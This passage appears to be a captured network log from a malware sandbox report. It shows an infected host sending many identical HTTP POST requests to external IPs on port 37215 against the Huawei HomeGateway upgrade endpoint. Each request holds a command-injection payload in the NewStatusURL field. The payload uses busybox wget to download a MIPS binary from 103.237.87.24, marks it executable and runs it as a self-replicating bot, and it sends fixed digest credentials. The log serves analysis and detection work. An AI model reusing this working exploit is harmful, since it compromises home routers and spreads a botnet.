                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  408192.168.2.134330041.168.214.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.108932018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  409192.168.2.134575641.187.156.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.109260082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  410192.168.2.135367097.149.211.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.109266043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  411192.168.2.134441241.134.253.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.109275103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  412192.168.2.1350574197.25.8.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.109294891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  413192.168.2.1345406197.15.76.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.109309912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  414192.168.2.133709441.153.27.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.109318018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  415192.168.2.133525841.210.91.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.109421968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  416192.168.2.134600241.134.125.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111320972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  417192.168.2.1354558197.73.188.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111325026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 